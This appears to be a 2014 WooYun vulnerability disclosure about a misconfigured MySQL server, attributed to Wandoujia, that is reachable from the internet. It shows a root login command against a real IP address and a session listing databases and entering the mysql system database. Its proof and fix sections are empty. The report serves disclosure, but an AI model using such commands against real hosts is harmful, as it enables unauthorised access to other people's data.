
Misconfigured database on a Wandoujia server is accessible from outside (high privileges, further penetration possible)

2014-07-31 16:25

This should belong to channel.wandoujia.com.



mysql -h 60.29.246.4 -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 752988
Server version: 5.5.28-log MySQL Community Server (GPL)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
ERROR 1046 (3D000): No database selected
mysql> show datbases;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'datbases' at line 1
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| channelDB          |
| mysql              |
| performance_schema |
| qiqi_apps          |
| test               |
+--------------------+
6 rows in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql>

Proof of vulnerability:

Fix:

Source: www.wooyun.org/bugs/wooyun-2014-065139
